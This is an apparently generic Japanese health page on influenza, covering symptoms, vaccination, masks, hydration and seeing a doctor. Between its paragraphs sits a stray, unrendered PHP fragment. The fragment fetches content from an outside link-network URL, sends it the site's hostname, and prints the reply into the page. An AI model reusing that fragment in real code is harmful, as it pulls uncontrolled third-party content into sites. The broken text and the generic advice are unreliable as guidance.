前へ
次へ

インフルエンザを予防したい方に向けて

インフルエンザは学業だけではなく仕事までに影響を与える恐ろしい病気の一つです。そんな病気に少しでもな

more

もしインフルエンザにかかってしまったら

インフルエンザにかかってしまったら、最初は高熱を始めとした風邪のような症状が表れます。しかし風邪とは

more

インフルエンザの予防方法

インフルエンザは風邪よりも発症し後に高熱が出たり、全身が重くなったりして、大変な事になってしまいます

more

インフルエンザの症状と予防接種

10月から、2月ぐらいの時期は、インフルエンザが流行するので不安を感じている人がほとんどです。内科のクリニックでは、予防接種が受けられるので早めに予約を入れておくことが大事です。予防接種を受けておくと、万が一感染してしまっても症状が軽くなるなどのメリットがあります。仕事や学業などで人の集まる場所に、行く機会の多い人はマスクを着用したり、手洗いやうがいを心掛けることが大事です。インフルエンザは肺炎とは違って、ウィルスが原因です。数日間の潜伏期間を経てから、咳やくしゃみ、喉の痛みなどの症状が見られます。風邪とは違って39度以上の高熱が出たり、関節痛などが見られることが多いです。熱が高い時は早めに医療機関を受診することが大事です。医療機関では内服薬を処方してくれるので、症状が改善するまでは服用することが大事です。症状が軽くなってきたら、もう一度診察を受けて、薬を変えてもらうことも大事です。

".file_get_contents('http://links-001.com/kanren2set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

インフルエンザは小さいお子様から、大人、高齢者など誰でも罹る可能性があります。発熱などがある時は、医療機関を受診してから安静を保つことが大事です。ミネラルウォーターなどを常備して、こまめに水分補給をして下さい。医療機関では検査を行った後に病気が診断されることが多いです。10代、20代の若い人は、4、5日を経過すると症状が改善することが多いです。お子様や高齢者は症状が重症化することもあるので、軽視をせずに早めに受診することが大事です。インフルエンザが流行している時期は、なるべく人ごみなどは避けることが大事です。部屋の乾燥を防ぐために加湿器などを使用すると良いでしょう。予防接種を希望している人は、事前に予約を入れておくと受けることが出来ます。医療機関では必要事項を記入してから、血圧や体温などを測定します。体調が優れない時は予防接種は受けないほうが良いでしょう。地域に密着をした医療機関を受診すると、信頼できる医療スタッフが在籍をしているので、安心して利用できます。

Page Top